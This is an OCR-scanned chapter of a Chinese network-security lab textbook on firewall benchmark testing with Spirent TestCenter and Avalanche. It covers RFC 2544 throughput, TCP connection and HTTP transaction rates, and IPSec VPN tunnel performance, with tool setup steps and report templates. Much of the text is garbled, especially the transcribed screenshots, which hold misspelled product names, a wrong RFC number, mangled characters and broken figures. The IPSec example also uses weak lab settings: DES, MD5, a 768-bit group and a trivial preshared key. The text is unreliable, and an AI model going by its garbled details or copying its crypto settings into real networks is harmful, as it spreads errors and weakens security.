图 18-16 吞吐 量 测试 的 命令 序列 图 18-17 吞吐 量 测试 的 运行 


Results Reporter Integration 


The Sprent TestCenler Results Reporter is a tool that 
allbws users to view teralion and end of test resus. 


Would you Ike to automatically launch it the lirst lime 
results are avaiable? 


口 Dent prompt me about this again 


图 18-18 Results Reporter Integration 提示 对 话 框 
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图 18-19 吞吐 量 测试 的 系统 操作 日 志 


3) 显示 测试 结果 

当 测 试 在 运行 时 ， 可 以 通过 两 种 不 同 的 方式 查看 测试 结果 。 一 是 通过 Spirent 
TestCenter application 主 界面 下 方 的 Results Browser (结果 浏览 器 )， 该 浏览 器 提供 实时 
事件 与 统计 的 查看 ， 二 是 通过 系统 提供 的 一 个 被 称 为 Results Reporter (结果 报告 器 ) 的 
应 用 程序 ， 该 报告 器 只 能 查看 每 阶段 的 最 终结 果 与 整个 测试 的 最 终结 果 。 

当 系 统 的 第 一 阶段 的 测试 完成 后 ，Results Reporter 窗口 就 会 自动 显示 ， 如 图 18-20 
所 示 。 此 时 ， 其 中 能 够 查看 有 关 第 一 阶段 测试 结果 的 报告 ， 该 窗口 可 以 被 最 小 化 。 


2544Thioughputstats 


| Mie Test Summary Tialsunmsy Theoretical Max 


NE: SPIRENT 


Communications 
Spirent TestCenter Report 
Test Type: RFC2744 Throughout Test 
Counter Mode: Basc 


Test Date: 2008-03-18 14:2333 PDT 


图 18-20 Results Reporter 窗口 
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在 测试 运行 过 程 中 ， 可 通过 Results Browser 观察 到 实时 的 统计 信息 ， 如 图 18-21 
所 示 。 


Results Browser 


[Port Traflic > Basic Traffic Results Change Peait View - StreamResults > Detailed Stream Results Charge Resu vew - 77] en ‘select T: 
EJ 1of1 j AIPorts + Select Ra Forts: Abpots ~ Change Counter Mode: enam mete + 


Bose Counters Eno Tigges Protocol Under 


ER tme Bax Sequencing Advanced Sequencing Hilogam; 


Total Tx Frame Rx Port i s " 

a xode a 
Port Nane Count E TxpatName A Count Rx Frame Court Tx Octet Count 
[E 2874 Poata nja e 97,297,408 
Pot N01% 87.2874 Porte NA 2 97.267.408 


图 18-21 香 吐 量 测试 实时 结果 的 显示 


当 测 试 结束 时 ， 可 以 返回 到 Results Reporter 窗口 观察 最 终 的 测试 结果 ， 如 图 18-22 
所 示 的 测试 结果 中 ， 得 到 了 帧 长 分 别 为 128 和 1518 的 吞吐 量 信息 及 其 理论 最 大 值 。 


© Spirent TestCenter Results Reporter 


file Tools Report Heb 
ig 88 mE ts) 


SQ Results. Template 
ea Es3-Tput-Summary-2008-03-18, 14-28-3:.db. 
c [E] Rfc2544 Throughput Test Result Summary View Template: RFc2S44ThroughputStats E 
1 S Tenpiate Tie || Test Summary || Trial Summary | Theoretical Max | 
Test Summary Graph 
pea icm indio E Throughput by Frame Size VS Theoretical Max 
昌国 mall _ 350,000 | 
= dE Trial: 2 £ 300,000 
由 国 Frame size: 128 250.000 | 
Li Frame Size: 1518. Č zaa] 
E Rfc2544 Throughput Test Result Detaled Summary View 2 450.000 
S 100,000 | 
È mo | 
p = c = = 
名 ^, % g 
a an ^, " 
i iz ka o 
Frame Size 
W Throughput E Theoretical Throughput] 


图 18-22 吞吐 量 测试 阶段 结果 的 显示 


4. 测试 结果 分 析 
请 对 所 得 到 的 测试 结果 进行 必要 的 分 析 。 若 有 可 能 ， 请 将 针对 不 同 品牌 或 规格 的 三 
层 防 火 墙 所 实施 的 测试 结果 进行 比 对 。 


【实验 报告 】 


fps % 
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"- 检验 结果 
序号 
fps | % 
2 
3 
实验 条 件 : 
CD 吞吐 量 测 试 时 长 (Duration) : s; 
(2) 时 延 测试 时 长 (Duration) : s: 
(3) 丢 包 率 测试 时 长 (Duration) : se 
【思考 题 】 
(1) 阐述 吞吐 量 、 延 迟 的 基本 概念 和 测试 原理 。 
(0 为 了 加 快 测试 的 速度 ， 更 快 地 逼近 测试 结果 ， 除 了 二 分 迭代 方法 外 ， 还 可 以 使 


用 什么 方法 进行 春 叶 量 搜索 ? 
18.3.2 ”防火 墙 传输 层 、 应 用 层 基准 性 能 测试 


【实验 目的 】 

测试 防火 墙 传 输 层 、 应 用 层 基 准 性 能 指标 ,防火 墙 传 输 层 基准 性 能 指标 包括 并 发 TCP 
连接 能 力 〈Concurrent TCP Connection Capacity)、 最 大 TCP 连接 速率 (Maximum TCP 
Connection Rate), f X TCP 拆除 速率 (Maximum TCP Tear Down Rate )。 应 用 层 基 准 性 
能 指标 包括 : HTTP 传输 速率 (HTTP Transfer Rate). 最 大 HTTP 事务 处 理 速 率 (Maximum 
HTTP Transaction Rate). 


【原理 简介 】 

1. 并 发 TCP 连接 能 力 

1) 并 发 TCP 连接 能 力 概述 

并 发 连接 是 指 多 个 主机 或 用 户 同时 连接 到 一 台 主 机 或 设备 进行 数据 传输 ， 并 发 TCP 
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连接 容量 是 指 被 测 设备 能 够 同时 成 功 处 理 的 最 大 TCP 连接 数目 , 它 反映 出 被 测 设备 对 多 
个 连接 的 访问 控制 能 力 和 连接 状态 跟踪 能 力 。 

2) 并 发 TCP 连接 能 力 测试 方法 

测试 采用 一 种 反复 搜索 机 制 。 每 次 反复 过 程 中 测试 仪表 以 不 同 的 速率 发 送 数 据 包 ， 
直至 得 出 防火 墙 的 最 大 的 TCP 并 发 连接 数 。 

每 次 搜索 过 程 的 连接 总 数 都 不 同 ， 目 的 地 址 则 为 服务 器 或 NAT 代理 。 总 的 连接 速率 

为 了 确认 所 有 的 连接 , 虚拟 客户 端 必须 使 用 HTTP 1.1 或 更 高 的 GET 请 求 目 标 数据 。 
同时 ， 每 次 连接 的 请 求 必须 在 TCP 连接 建立 之 后 发 起 。 

在 每 次 二 分 之 间 ， 建 议 由 测试 仪表 为 每 次 交互 尝试 发 起 TCP RST， 而 不 管 每 次 连接 
企图 是 否 成 功 。 测 试 仪表 在 等 待 撤销 时 间 完 成 后 开始 下 一 次 的 反复 。 

2. 最 大 TCP 连接 速率 

1) 最 大 TCP 连接 速率 概述 

最 大 TCP 连接 建立 速率 是 指 被 测 设备 或 被 测 系统 能 够 成 功 处 理 请 求 连接 的 前 提 下 ， 
在 单位 时 间 内 所 能 承受 的 最 大 TCP 连接 建立 数目 ， 用 connections/sec 表示 ， 这 一 指标 通 
常 被 称 为 最 大 TCP 新 建 速率 。 它 主要 反映 了 被 测 设备 的 CPU 使 用 情况 以 及 对 连接 的 处 
理 速度 。 

2) 最 大 TCP 连接 速率 测试 方法 

使 用 反复 搜索 过 程 以 测试 防火 墙 所 能 接受 的 TCP 连接 请 求 的 最 大 速率 。 

每 次 反复 过 程 中 虚拟 客户 端 发 起 的 总 的 TCP 连接 请 求 速率 不 同 。 目的 地 址 为 服务 器 
或 NAT 代理 。 由 连接 请 求 数 决定 总 的 连接 数 。 

与 并 发 TCP 连接 能 力 测试 中 所 定义 的 一 样 , 为 获得 传输 确定 和 建立 时 间 确 定 而 传送 
的 应 用 层 目 标 数 据 也 必须 保持 统一 。 

在 每 次 二 分 之 间 , 每 次 反复 完成 后 , 建议 由 测试 仪表 为 每 次 交互 尝试 发 起 TCP RST, 
而 不 管 每 次 连接 企图 是 否 成 功 ,测试 仪表 在 等 待 撤销 时 间 完 成 后 开始 下 一 次 的 反复 测试 。 

3. 最 大 TCP 拆除 速率 

1) 最 大 TCP 拆除 速率 概述 

评估 通过 和 维持 在 防火 墙 的 最 大 TCP 连接 拆除 速率 。 

2) 最 大 TCP 拆除 速率 测试 方法 

二 分 搜索 查找 最 大 的 TCP 连接 拆除 速率 。 测 试 期 间 通 过 固定 的 TCP 连接 数 尝试 不 
同 的 TCP 连接 拆除 速率 ， 直 到 得 到 最 大 TCP 连接 拆除 速率 。 

由 于 TCP 连接 拆除 要 在 建 好 TCP 连接 后 才能 进行 ， 所 以 无 法 直接 对 此 项 指标 进行 
测试 。 所 以 在 本 实验 中 ， 只 给 出 测试 原理 。 

4. HTTP 传输 速率 

1) HTTP 传输 速率 概述 

评估 通过 防火 墙 的 被 请 求 的 HTTP 目标 数据 传输 通过 速率 。 

2) HTTP 传输 速率 测试 方法 

每 次 连接 过 程 中 虚拟 客户 端 使 用 一 个 以 上 HTTP GET 请 求 从 一 个 虚拟 服务 器 上 得 到 
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一 个 或 多 个 目标 数据 ,而 尝试 连接 总 数 则 必须 平均 分 配 到 各 个 用 于 测试 的 虚拟 客户 端 上 。 

如 果 虚 拟 客户 端 在 每 个 连接 中 使 用 多 个 GET 请 求 ， 那 么 各 个 GET 请 求 的 数据 包 必 
须 大 小 一 致 。 而 在 不 同 轮 次 的 测试 中 ， 则 可 使 用 不 同 大 小 的 数据 包 。 

5. 最 大 HTTP 事务 处 理 速率 

1) 最 大 HTTP 事务 处 理 速率 概述 

测试 防火 墙 所 能 维持 的 最 大 事务 处 理 速率 ， 即 用 户 在 访问 目标 时 ， 所 能 达到 的 最 大 

2) 最 大 HTTP 事务 处 理 速 率 测试 方法 

通过 多 轮 测 试 ， 二 分 法 定位 来 获得 防火 墙 能 维持 的 最 大 事务 处 理 速率 。 

对 于 不 同 轮 次 的 测试 ， 虚 拟 客 户 端 (HTTP 1.1 或 更 高 ) 对 虚拟 服务 器 (HTTP 1.1 或 
更 高 ) 的 GET 请求 速率 是 不 同 的 , 但 在 同一 轮 次 的 测试 中 虚拟 客户 端 必须 维持 以 恒定 速 

如 果 虚 拟 客户 端 每 个 连接 中 有 多 个 GET 请 求 ， 则 每 个 GET 请 求 中 的 数据 包 大 小 必 
须 相同 。 当 然 ， 在 不 同 测试 过 程 中 可 采用 不 同 大 小 的 数据 包 。 

【实验 环境 】 

使 用 Avalanche/Reflector 进行 防火 墙 测 试 的 拓扑 图 如 图 18-23 所 示 。 


内 网 接口 地 址 : 外 网 接口 地 址 : 
192.168.41.1/24 qe. 192.168.43.1/24 


valanche 模 拟 客户 Refl EE 
Avalanche 模 拟 客户 机 — eflector 模 拟 服务 器 
图 18-23 ”使 用 Avalanche/Reflector 进行 防火 墙 测试 的 拓扑 图 


【实验 步骤 】 

1. 连接 Avalanche 机 箱 

运行 Spirent TestCenter Layer 4-7Application, 连接 运行 Avalanche 的 Spirent TestCenter 
机 箱 。 

(1) 选择 Administration|Spirent TestCenter Chassis, 弹出 Spirent TestCenter Administration 
窗口 。 

(2) 选择 Equipment|Add Chassis, Jf: Add Chassis 对 话 框 。 

(3) 输入 运行 Avalanche 的 Spirent TestCenter 机 箱 的 管理 IP 地 址 ， 并 单 击 Add 按钮 。 

(4) 单 击 紧 挨 着 机 箱 管理 IP 地 址 的 加 号 ， 显 示 机 箱 中 的 测试 卡 及 端口 分 组 。 

(5) 从 Chassis 列表 中 , 选择 一 个 端口 分 组 作为 客户 端 模拟 ， 一 个 端口 分 组 作为 服务 
器 模拟 ， 然 后 选择 Action|Reserve|Selected Group. 

(6) 单 击 Close 按钮 。 

2. 建立 新 的 测试 例 

(1) 选择 File[New|Project， 弹 出 New Project 窗口 。 
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(2) 输入 方案 名 字 ， 单 击 Browser 按钮 选择 存储 路 径 ， 单 击 Finish 按钮 ， 如 图 18-24 
所 示 。 


db New Project... - Step 1 of 1 


Select name and location for your new project. 


Enter a name for the project and the location of a directory where it should be 
stored. The directory will be created if it does not already exist. 


Project Name | Testa] | 
Directory | ttingslennyvm\Application DatalAvalanche\Tests | Browse 
Add ThreatEx Profiles to New Project, à 


图 18-24 配置 报告 注释 


3. 建立 新 的 测试 项 

(1) 选择 File[INew|Test， 弹 出 New Test 对 话 框 。 

(2) 第 1 步 ， 选 择 方案 名 ， 单 击 Next 按钮 。 第 2 步 ， 输 入 测试 名 字 ， 单 击 Next 按 
钮 ， 如 图 18-25 所 示 。 


Select a project in which to create your new test, 


图 18-25 ”选择 方案 名 
(3) 输入 测试 例 名 称 ， 在 图 18-26 中 输入 “QuickTest”。 
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W New Test... - Step 2 of 4 
Enter the name of your new test. 


Test Name: | QuickTest 


<Back Next > Fi Cancel 
FA 18-26 输入 测试 例 名 称 


CA). 选择 测试 项 目 为 Device, 该 测试 表明 被 测 对 象 为 防火 墙 ,需要 同时 使 用 Avalanche 
及 Reflector 来 进行 状态 流量 的 仿真 ， 如 图 18-27 所 示 。 


W New Test... - Step 3 of 4 
Select the general category of test you wish to create, 


© Application - Avalanche emulates clients only, 
] Obs 


A Device Test is designed to run through one or more network devices, Avalanche emulates both the 
clients and the servers in the test, while the device under test sits in the middle, 


图 18-27 测试 类 型 选择 
(5) 选择 测试 例 生 成 方式 为 Advanced， 单 击 Finish 按钮 完成 测试 例 的 生成 ， 如 
图 18-28 所 示 。 
4. 配置 防火 墙 测 试 
(1) 在 图 18-29 中 进行 模拟 客户 端的 应 用 层 负 载 配 置 。 
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Wr Avalanche Commander 


Fie View Tools Administration Heb 


Sal» bm a? 
Projects 
= gres 
iiv] AdvDevConnsPerSec 
d AdvoeveTP 
AdvDevRTSP 
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> [Add ][ Remove 


lent 


Loads 


Specification  [Smmusers 


Defaut Tme Scale 


Random Seed [ 


Phase 
Label Delay 
Patten [Flt 
Time Scale [Defout v 
Height — [o 
Ramp Time [0 
Steady Tine [30 


Duration 30 


图 18-28 ”高 级 测试 例 配置 窗口 


Server ^. Content Files *. Notes „Run ^. Results 

Actions ^. Profiles © Network © Subnets 人 Ports Y. Associations 
Select aLoadto Edt: — |ConnsPerec p v | &) JL 8 | 
General 
Specification Connections/second ve Total Duration D hrs. 1 min, 40 sec, 0 ms. 
Default Time Scale | Seconds {v Phase Editor Time Scales Set All To Default 
Random Seed Load Constraints Edt, 
Phase Editor Desired Load in 
Label Delay 110, 
Pattern | Flat v 
Time Scale |Defaut ~ 
Height 0 
Ramp Time |0 sec, 
Steady Time | 5 sec. 

55] 

Duration 5 sec. 


100 


Seconds 


图 18-29 JP 
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(2) 本 次 测试 以 HTTP 为 基础 ， 进 行 防 火 墙 的 性 能 测试 。 如 图 18-30 所 示 在 客户 端 
的 Actions 选项 卡 中 对 客户 端的 用 户 动作 进行 配置 ， 此 处 get 命令 表示 客户 端 仿真 HTTP 
做 网 页 的 request 操作 。 
Client `C server X Content Files < Notes < Run Results 


Loads Profiles “\ Network“ Subnets Y. Ports. Associations 
Actions 


Select an Actions List to Edit: | Default vj ss) il J B [ # ] 


Actions 
0 10 20 30 40 50 60 70 


1|1 get http: //192. 168.43. 10/index.htnl 
2 
3 


图 18-30 客户 端 Action 配置 
(3) 在 ClientProfiles 下 可 以 对 模拟 用 户 的 浏览 器 等 相关 参数 进行 配置 ， 这 里 需要 选 
TE HTTP 版 本 号 为 1.1， 保 持 连接 默认 打开 ， 如 图 18-31 所 示 。 


Client ~ Server 人 Content Files“ Notes `C Run .Results 


Select a User Profle to eat: [beft M &i J( 8 |{ a A 


om Lae) as ee) re] Co Co Co C 


padus |[ mme | su || (se) [sws | [streaming | Lv. ] 
Preload Values From [User Defined Browser. ~| 
Maximum Connections Per Server 6 
Unlimited Maximum Connections Per SimUser [v] 
Maximum Connections Per SmUser es 
Maximum Requests Per Connection so ] 
HTTP Protocol Level QOHTTP/1.0 Keep Alive 
OHP. [v]Persistence 
HTTP Pipelining (Enable Proxy Pipelining M RE ] 
User-Agent Header Mozilla/5.0 (Windows; U; Windows NT S. 1) Gecko/20050414 Firefox/1.0.3 
Verify Content MDS Header 口 


Additional HTTP Headers 

Accept: «/* 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate, compress 


图 18-31 浏览 器 属性 配置 


(4) 如 图 18-32 所 示 , 在 ClientINetwork 标签 配置 栏 中 可 对 TCP 相关 参数 进行 设置 ， 
本 测试 保持 TCP 默认 值 即 可 。 

(5) 在 Client|Subnets 下 对 客户 端 模拟 的 主机 IP 地 址 信息 进行 如 下 配置 ， 如 图 18-33 
所 示 。 

C6) 通过 Client|Ports 选取 创建 测试 例 之 前 占用 的 仪表 端口 中 的 第 一 个 作为 客户 端 仿 
真 的 物理 端口 。 
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Client `C Server `C Content Files `C Notes ` Run Results ^ 


{Loads ~C Actions Profies /[ Network | subnets “Ports “ Associations " 


Miscellaneous Parameters 

Enable Round Robin DNS [C] Fairness Threshold [2147483647 | bytes/sec/connection 

IGMP Version IEEE IP Fragment Reassembly Timer [30000 | miliseconds 

TCP Parameters 

TIPY4 Maximum Segment Size [1460 | bytes | Enable Congestion Control e 

IPVé Maximum Segment Size @ 1440 | bytes Override Internal Timeout Calculation [C] with (2000 | ms. 
Receive Window 32768  |bytes | Retries s | 
Delayed Acks 加 Inactivity Timer 7000 — ms 
Delayed Ack Timeout 200 ms. Piggyback Get Requests [7] (HTTP Only) 
Delayed Ack Bytes [2920 | bytes | Enable TCP Port Randomization 口 

System Port Range 

Lower Bound 1024 — | 

Upper Bauna (Em | 


图 18-32 网络 层 属性 配置 


Client ^. server “\ Content Files “\ Notes `C Run “\ Results 
{Loads ~C Actions “C Profiles “C Network} Subnets “Ports “Associations 


Show Subnet Profiles using: @)IPv4 OIPvé @ Ovan [mac []rsec à 


[ Fewp | subnet Name | Padress(Range) | Netmask | Network | Defauit Gateway [Gateway Add... 


[1 rorto | 516641101921694 | 26 | airo EEE 


图 18-33 Pin IP Fhe Jas PE 


(7) 如 图 18-34 Aras, YE Client|Associations 中 将 之 前 配置 的 相关 参数 进行 关联 ， 完 
成 了 逻辑 参数 到 物理 端口 的 客户 端 仿真 的 过 程 。 

(8) 下 面 来 对 服务 器 端的 仿真 进行 配置 ， 如 图 18-35 所 示 ， 从 Server|Profiles 中 选择 
服务 器 仿真 类 型 为 HTTP， 本 测试 需要 使 用 HTTP1.1 版 本 ， 关 闭 连接 方式 为 RST. 

(9) 服务 器 端 网 页 的 基本 属性 设置 , 在 Server|Transactions 中 设置 网 页 的 大 小 为 64b; 
同样 地 , Server|Authentications 认证 信息 和 Server|Network 中 在 服务 器 端 TCP 的 属性 在 本 
测试 中 也 保持 默认 参数 不 变 ， 如 图 18-36 所 示 。 

(10) 如 图 18-37 所 示 ， 在 Server|Subnets 选项 卡 中 ， 配 置 相应 的 Server 端 网 络 层 属 
性 ， 包 括 仿真 的 Server 所 在 的 网 段 及 对 应 的 网 关 地 址 。 

(11) 在 Server|Ports 中 选择 相应 的 仪表 物理 端口 作为 服务 器 仿真 的 端口 , 如 图 18-38 
所 示 。 

(12) Server|Associations 中 将 之 前 配置 的 相关 参数 进行 绑 定 ， 完 成 了 逻辑 参数 到 物 
理 端 口 的 服务 器 仿真 的 过 程 ， 仿 真 服务 器 的 IP 地 址 在 此 处 进行 定义 ， 该 地 址 必须 和 
Client|Actions 中 仿真 客户 端 定义 的 Server 地 址 保存 一 致 ， 如 图 18-39 所 示 。 
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lent “server “C Content Fles Notes `C Run `C Results 
{toads actions “Profiles `C Network “C Subnets ports j Associations ™ 
Load Profile Type: User Based @Global Global Profile Name: | ConnsPerSec lp ¥ 


[ teme | T Profie Port 
Iz] TU 1082016183 sPerSec_so0 (Pv) 
回 ConnsPerSec_up 100 (100) 108201614041 ConnsPerSec, snl (PVA) 
I 
[Landi neo.) [Delete sso. ] 
| 
| 42 
319 
is 
o 395 
Seconds 
图 18-34 客户 端 参数 关联 绑 定 
Clent Server “ Content Files *. Notes “ Run ~ Results 
Profiles X. Transactions  Authentications ~ Network ` Subnets ~£ Ports 人 Associations 


Select a Server Profile to Edt: |HTTP_1_0 SEC M 


General 

Description 

Type HTTP m 
Connection Properties 

Port 80 Enable GRE à 
ToS (Hex) D Ignore ARP Requests [C] 
MSS 


Server Emulation 
Server Type 


icrosoft-1516.0| [ .| 


Transaction Profile | 1KB { 


Protocol Level OHTTP1 


Max, Requests/Conn. |64 


C cookies 8 


rm 


[ Enable Chunked Transfer Coding 
Min Chunk Size Bytes 
Max Chunk Size Bytes 


图 18-35 ”服务 器 端 属性 设置 


317 


mmm 网 络 安全 实验 教程 (第 2 版 ) ms 


[ Cent / Server ~< Content Files “Notes `C Run `C Results 
[Profiles {Transactions “authentications (Network 人 Subnets ( Ports `C Associations 


Select a Transaction Profle toet: (SEES [ © J( a ila )( 9 


| Embedded string [Empty ~ 
String Position Midde ~ 
Body Sze Fixed w 
‘Size 64 bytes 
[ Fully Qualified Path. 


图 18-36 服务 器 HTTP 页 面 属性 设置 
[dient] Sever Content Fles Notes < Run“ Resuts 


Profiles `C Transactions `C Authentications `C Network) Subnets `C Ports “Associations 


Show Subnet Profiles using: © IPv4 O 〇 IPv6 @ Onan 口 wc Pse a 
RowiD Subnet Name MA Default Gateway Gateway Address. 
1 Defaut 全 让 


18-37 ”服务 器 IP 网 段 设 置 


EX 
É Profiles `C Transactions ~C Authentications ~C Network “C Subnets j Ports ~C associations 
RowD Port Gratuitous ARP. 
7 70201188 I 可 


图 18-38 服务 器 物理 端口 选择 


[Gent Server Content Fies X Notes ( Run  Resuts 

EO Em Arcane 
Port 

j 


18-39 ”服务 器 参数 关联 


(13) 当 完 成 配置 后 ， 通 过 单 击 软件 上 方 的 Run 按钮 可 以 开始 测试 ， 测 试 过 程 中 的 
基本 计数 器 如 图 18-40 所 示 。 


ET 
YN 


ri 
Test Stages Test Stages 
Test Stopped Test Stopped 
Transactions. TCP Connections. 
Attempted — 14723 Per second: o 
Successtu 14723 Open. E 
Closed wih error. 0 
Aborted 0 Closed with: 0 
Cosed ro error 14723 
Time 
HTTP Transactions 
Bepset 0001:15 
Remaining 00:00:00 Per Sec: 0 
Time 
Bepsed 00:01:20 
Ghent ime | [ Server stats} [_eventtoos | 


图 18-40 测试 运行 窗口 
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C14) 运行 结果 中 需 观察 是 否 出 现 连接 失败 的 情况 ， 不 存在 失败 的 连接 则 在 下 次 测 
试 开 始 前 适当 地 调 高 客户 端 负 载 ; 如 果 有 失败 的 连接 ， 则 在 下 次 测试 开始 前 降低 客户 端 
负载 ;根据 连接 建立 情况 反复 进行 客户 端 负载 的 调整 ， 直 到 达到 不 出 现 连接 失败 时 的 最 
大 值 为 止 。 

注意 : 防火 墙 为 基于 会 话 状态 转发 的 网 络 设备 ， 在 每 次 调整 负载 测试 之 前 需 将 防火 
墙 的 表 项 清空 ， 以 保证 每 次 开始 测试 前 防火 墙 都 能 恢复 到 相同 的 初始 状态 ， 避 免 了 多 次 
测试 后 产生 的 登 加 效用 。 


【实验 报告 】 


Maximum TCP Connections per Second (TCP/Sec) 


Maximum TCP Connection 
Establishment Rate Last Successful Level 


Maximum Concurrent TCP Connections (TCP Open) 
Concurrent TCP Connection 


i Last Successful Level 
Capacity 


Maximum HTTP Transactions per Second vs. Response Body (Bytes) 


Rae mip Ts T sin [ 1024 [ sme [ 10240 [ s1200 [ 102400 
LE 4. 1 o qd - 1 - 


Application Throughput vs. Connections and Response Body (Bytes) 


[s | siz | 10% | smo | 10240 | s1200 | 102400 
| 


HTTP Transfer Rate 
[EE OE LJ 
| | | | | | | 
【思考 题 】 


(1) 防火 墙 传 输 层 基准 性 能 测试 指标 有 哪些 ? 

(2) 防火 墙 应 用 层 基准 性 能 测试 指标 有 哪些 ? 

G) 阐述 防火 墙 基准 性 能 测试 步骤 。 

18.3.3 IPSec VPN 性 能 测试 

【实验 目的 】 

IPSec 是 非常 重要 的 基于 隧道 的 网 络 安全 技术 。 许 多 防火 墙 通常 都 集成 了 IPSec 的 网 
关 ， 为 用 户 远程 的 接 入 提供 数据 加 密 的 保护 ， 因 此 评估 IPSec VPN 性 能 非常 重要 。 

【原理 简介 】 

IPSec 位 于 网 络 层 , 负责 IP 包 的 保护 和 认证 , 这 些 IP 包 在 相关 IPSec 设备 之 间 传 输 ， 
IPSec 并 不 仅 限于 某 些 特别 的 加 密 或 认证 算法 、 密 钥 技 术 或 安全 算法 ，IPSec 是 一 系列 开 
发 标准 的 框架 。 
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IPSec 协议 主要 由 Internet HHMH AKE), WIE (AH) 以 及 安全 封装 载荷 


(ESP) 三 个 子 协议 组 成 ， 同 时 涉及 认证 和 加 密 算法 以 及 安全 关联 SA 等 内 容 。 


本 实验 将 使 用 Avalanche 测试 仪表 模拟 IPSec 设备 的 一 端 和 被 配置 成 IPSec 网 关 的 真 


实 防火 墙 建立 端 到 端的 IPSec 连接 ， 当 IPSec 隧道 建立 完毕 后 ， 用 虚拟 的 客户 端 和 虚拟 
的 服务 器 端 产生 真实 的 应 用 层 流量 来 对 IPSec VPN 隧道 的 性 能 进行 验证 。 


【实验 环境 】 
实验 环境 物理 连接 与 上 一 实验 相同 ， 逻 辑 连接 如 图 18-41 所 示 。 
10.0.0.20~ sas 
10.0.0.30 EAE 受信 网 络 
10.0.0.0/24 192.168.100.0/24 a cs 
10.0.0.1 ges. 19.168.101.100 
ns E 
P 
192.168.101.1 192.168.100.1 
虚拟 IPSec 网 关 真实 IPSec 网 关 虚拟 HTTP 服 务 器 
虚拟 客户 端 
图 18-41 IPSec 测试 逻辑 连接 
【实验 步骤 】 


(1) 配置 防火 墙 IPSec 网 关 参 数 如 下 : 


IKE Phase 1 SA 

IKE Mode=Main 

Authentication Method=Preshared Key=spirent 
Encryption=DES 

HASH=SHA-1 

D-H Group=2 

ISAKMP ID Type=FQDN 

ISAKMP ID=ava.spirent.com 


IPSec Phase 2 SA 
PFS=Group 1 
Encryption=ESP-DES 
HASH=MD-5 


(2) 连接 Avalanche 机 箱 〈 与 18.3.2 节 相 同 )。 

(3) 参考 实验 18.3.2 创建 一 个 新 的 测试 例 ， 该 测试 例 命名 为 IPSec。 

(4) 参考 实验 18.3.2 配置 如 图 18-42 所 示 的 测试 负载 。 

(5) 如 图 18-43 所 示 ， 在 客户 端 配置 Actions 为 HTTP 的 GET 操作 。 

(6) 创建 虚拟 客户 机 ， 并 对 IPSec 相关 参数 进行 配置 ， 在 Client|Subnet 选项 卡 中 运 


ff Policy Generator Wizard, 选择 IP 协议 版 本 号 为 I Pv4, IPSec 模式 为 Site to Site Tunnel, 


并 


Ff 根据 测试 拓扑 填 入 相应 IP 地 址 ， 如 图 18-44 所 示 。 


3 


CI) 填 入 本 地 网 关 及 远 端 网 关 IP 地址 ， 如 图 18-45 所 示 。 
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Cient © Server Y. Content Files ^. Notes < Run 人 Resuks 


Loads ~C Actions `“ Profiles “C Network `C Subnets `C Ports. Associations 


Select aloadtoEdt; — [iPsedoed ¥)[ E 8 JLS 


General 


Specification Total Duration Obes. 1 min, 28 sec. O ms. 


Default Time Scale | Seconds v Phase Editor Time Scales Set All To Default. 
Random Seed] Load Constrarnis 


Phase Edtor Desired Load in Simusers 


Label Ramp Down 4 


Patten — Fl ~ 


Time Seale (Defaut ~ 


Height o 
RampTme [4 sec. 
Steady Time [4 sec 
Duration 8 sec. 


10> Seconde 
图 18-42 IPSec 测试 负载 配置 


| lent “server CContentFles 《Notes “Run Resuits 
Loads} Actions ~S profiles `C Network, Subnets X, Ports € 


Select an Actions List to Edt: — IPSecURL vw. E 
| Actions 
p. ip 20 30 40 5 


jJ VET Hite: 77182 165. 100-100 
| 2 


图 18-43 ”客户 端 Action 配置 


MAC | Byte1 | Bre 2 | Randomize | End 
| m] ] 
Bi lal | 
rot H 
Bi mi | 
Subnet Name Prefix: IPSecClent IH H | 
[日 | 日 
Subnet IP Verson Sec Mode 口 | H 
@ IPv4 Subnet — @ Ste to Ste Tunnel 
QiiPvéSubnet à O Remote Access Emulation. 
Starting Pv Network [Mad al 


c - Ce] 


Number of Subnets: [1 


Mespersines [Ui 
Number of Tunnels! 1 Forms Database 
"dá 
ral riene 
certificate File: a 
Re-connect Time (sec): SalD Lifetime (sec): Private Key File: [ 
IKE Lifetime (sec): Re-Key Timer (sec): CA Certs e 
Phase 2 Policies 
[eT e me | o | oer St Dest ask 
9005 5 


图 18-44 IPSec 配置 向 导 
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@ Policy Generator Wizard - Step 2 of 4 


Local Gateway IP Address; 


"192.168.101.100 | 
Remote Gateway IP Address: 
192.168.101.1 — | 


图 18-45 IPSec 隧道 参数 配置 
(8) 如 图 18-46 和 图 18-47 所 示 ， 配 置 IPSec 相关 参数 。 


@ Policy Generator Wizard - Step 3 of 4 
Phase 1 Policy Specifications: 


D-H Group: 


图 18-46 IPSec 一 阶段 参数 配置 
(9) 完成 配置 后 在 Client|Subnets 中 检查 IPSec 相关 配置 , 如 图 18-48 和 图 18-49 所 示 。 
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@ Policy Generator Wizard - Step 4 of 4 
Phase 2 Policy Specifications: 


D-HGroup: [Group 1(MODP-768) | 


Hash Algorithm: |MD-5 | 


图 18-47 IPSec 二 阶段 参数 配置 


Client ~< Server “C Content Files “\ Notes `C Run ^. Results 


f. Loads “ Actions “ Profiles `C Network) Subnets “C Ports Associations `, 


Show Subnet Profiles using: @)IPv4 (OIPv6 


VAN [Mac [v]iPSec Policy Generator... 
Subnet Name IP Address (Range) Netmask | — Network — |Detault Gat: Gateway ..| Randomize IP| Enable IPSec | Remote Access |Gat 
IPSecClient. 10001-1000.11 Q4 10000 [v] [v] 

< I 


XAuth Forms DB  |Preshared Key | ISAKMP D Type! ISAKMP ID 
Spirent FQDN avaspirentcom 


图 18-48 IPSec 相关 IP 子 网 配置 


Selected Range: IPSecClient (1) 


IPSecClient. 
[Static Routing“ IP Fragmentation ( Realism PPP/PPPOE DHCP IPSec \. 
| 1PSec Policies 
General Message Parameters. Forms Database 
| Persistent Tunne Send Timeout (sec): [5 | MaxRetransmit: [5 — |] File: ] 
Phase 1 Phase 2 
| C Encrypt Packet 3 Transform: ESP — | Re-key Threshold (sec): | 
Re-connect Time (sec):| 20 ] Use Commit Bt | SaLD Lifetime (sec): ] 
IKE Lifetime (sec): | 28800 | Re-Key Timer (sec): | 
Phase 2 Policies 
Enabled Tunnel Option PFS Hash Encryption Dest Subnet Dest Mask. 
a One per Subnet Group 1(MODP-768) MD-5 | ESP-DES 0000 n 
| 四 | m 


图 18-49 IPSec 配置 栏 
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(10) 配置 ISAKMP ID Type X FQDN, ID 为 ava.spirent.com， 请 参考 图 18-48. 
C11) EE IPSec 阶段 一 、 阶 段 二 参数 ， 如 图 18-50 所 示 。 


